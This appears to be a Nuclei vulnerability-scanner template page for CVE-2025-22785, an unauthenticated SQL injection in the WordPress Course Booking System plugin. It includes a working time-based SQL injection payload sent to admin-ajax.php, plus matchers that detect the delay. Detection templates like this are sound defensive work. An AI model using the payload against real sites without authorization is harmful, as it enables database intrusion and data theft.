Course Booking System <= 6.0.6 - SQL Injection
CVE-2025-22785
Verified
Description
The Course Booking System plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 6.0.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Severity
Critical
Published Date
February 13, 2026
Template Author
shivam kamboj
CVE-2025-22785.yaml
id: CVE-2025-22785
info:
name: Course Booking System <= 6.0.6 - SQL Injection
author: Shivam Kamboj
severity: critical
description: |
The Course Booking System plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 6.0.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-22785
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/course-booking-system/course-booking-system-605-unauthenticated-sql-injection
metadata:
verified: true
max-request: 1
tags: cve,cve2025,wordpress,wp,wp-plugin,sqli,course-booking-system
http:
- raw:
- |
@timeout: 30s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=cbs_action_booking_delete&booking_id=1&course_id=1 AND (SELECT 1 FROM (SELECT(SLEEP(8)))sqltest)
matchers:
- type: dsl
dsl:
- 'duration >= 8'
- 'len(body) == 0'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
condition: and
# digest: 4a0a00473045022100f8f2e43ac61373f282301eaf4fd70ec89330a1df8f6a56b6294ae434509424a40220689d325d482c7a1a4e86040e644713043ba21f0b9abc111ccc29b25c2fe51486:922c64590222798bb761d5b6d8e72950